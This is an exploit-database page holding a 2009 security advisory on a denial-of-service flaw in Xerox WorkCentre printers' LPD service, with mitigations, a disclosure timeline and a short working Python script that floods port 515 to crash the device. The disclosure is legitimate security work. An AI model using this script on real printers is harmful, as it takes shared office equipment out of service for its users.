0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Xerox WorkCentre Multiple Models Denial of Service Exploit
========================================================== Xerox WorkCentre Multiple Models Denial of Service Exploit ========================================================== # Louhi Networks Information Security Research # Security Advisory # # # Advisory: Xerox WorkCentre multiple models Denial of Service # Release Date: 2009/08/25 # Last Modified: 2009/08/25 # Authors: Juho Ranta # # Application: Xerox WorkCentre # Verified: Controller+PS ROM Version 1.202.1 and 1.202.5 # Devices: Xerox WorkCentre 7132, # WC7232/7242, WC7328/7335/7345/7346 and # WC7425/28/35 # Attack type: Denial of Service # Risk: Low # Vendor Status: Patch available for WC7232/7242 # References: http://www.louhinetworks.fi/advisory/xerox_0908.txt # # http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-081.html # # http://www.support.xerox.com/go/results.asp?Xtype=download&prodID=WC7232_WC7242&Xlang=en_US&Xcntry=USA # # # Overview # # Quote from http://www.xerox.com/ # "The Xerox WorkCentre 7132 multifunction is the affordable transition # to the next level of productivity for your office. One easy-to-use # device offers powerful printing, copying, scanning, and faxing. The # WorkCentre 7132 also gives you color when you need it, for critical # documents and for added impact. Robust functions, straightforward # operation, and color within your budget . that should keep everyone # smiling and productive." # # During a brief assessment performed for Xerox WorkCentre 7132 it was # discovered that LPD daemon implementation contains a weakness # related to robustness of LPD protocol handling. Attacker can crash # the whole device with a relatively simple attack. Recovering from # the denial-of-service condition requires power cycling the device. # # Details # # Device freezes when it is flooded with LPD requests having oversized # queue name length AND other features of the device are accessed # during the attack. # # The LPD daemon terminates the connection when it receives a request # with an oversized queue name. The required minimum length for this # seems to vary. Our proof-of-concept attack sends ASCII character # blocks to the LPD daemon until connection is closed, while sending # HTTP requests to the web administration interface. # # By flooding the device with these invalid LPD requests and accessing # other features at the same time, the device can be crashed. This was # verified with two different firmware versions (1.202.1 and 1.202.5). # # It must be noted that successful denial-of-service attack requires # the steps described above. Sending requests with oversized queue # names does crash the device by itself. # # Due to the black box nature of the performed attack against a # production device, we were not able to determine the exact root # cause for the crash. According to vendor this is caused by a memory # leak, but further exploitability or memory corruption has neither # been confirmed nor denied. # # Vulnerability was detected with an LPD protocol implementation # written for Sulley Fuzzing Framework. # # # Preconditions # # *LPD daemon is enabled. # *Attacker has network access to the LPD daemon # *Attacker has network access to other features OR # *Valid user uses the device on location # # # Symptoms of successful attack # # One or more of the following: # *Control panel lights are blinking, no response to pushing buttons # *LCD panel displays error message # *LCD panel displays a halted progress bar # *Switching power off from on/off button takes more than 10 seconds # # Proof of Concept: # # Python code available at: # http://www.louhinetworks.fi/advisory/xerox/exploit.py # http://www.louhinetworks.fi/advisory/xerox/webInterface.py # # Pictures of a crashed control panel (Finnish language): # http://www.louhinetworks.fi/advisory/xerox/error1.jpg # http://www.louhinetworks.fi/advisory/xerox/freeze1.jpg # # Web interface requests are performed with a separate Python # process/script in order to achieve more reliable exploitation under # Windows. # # Mitigation: # # Preventive # *Install patch from vendor # *Configure IPS signature for LPD requests with oversized queue # names # *Allow only trusted users to access LPD daemon # *Disable LPD daemon # # Detective # *Configure IDS signature for LPD requests with oversized queue # names # # Disclosure Timeline (selected dates): # # X 2008 - Vulnerability discovered # 3. September 2008 - Contacted CERT-FI by email describing the # issue with Xerox WC 7132 # 20. November 2008 - CERT-FI confirms vendor has been notified # 21. January 2009 - Vendor is unable to reproduce the issue, # but continues trying # 22. January 2009 - Vulnerability reproduced, vendor investigates # other devices. Apologizes slow response. # 17. June 2009 - Vendor has identified vulnerable devices, # patch due in July. # 20. August 2009 - Patch available for download (only # WC7232/7242) # 25. August 2009 - Advisory released # # A Big Thank You to CERT-FI's Vulnerability Coordination for persistent # coordination effort. # # Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties, # no liabilities, information provided 'as is' for educational purposes. # Reproduction allowed as long as credit is given. Information wants to # be free. import socket import sys import os import httplib import signal if len(sys.argv) < 2: print("Usage: python exploit.py printerIpAddress") print("After the script is started, execute the webInterface.py script") sys.exit(0) ipAddress = sys.argv[1] i = 0 while True: i += 1 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ipAddress, 515)) except: # If the connection fails, printer has crashed print("Unable to connect") sys.exit(0) # Send receive a printer job -command. Queue name will be as long as # possible. The printer will disconnect when the queue name has reached it's # maximum length s.send("\x02") j = 0 while True: j += 1 s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") print(str(i) + "." + str(j)) s.close() print(i) # 0day.today [2024-12-24] #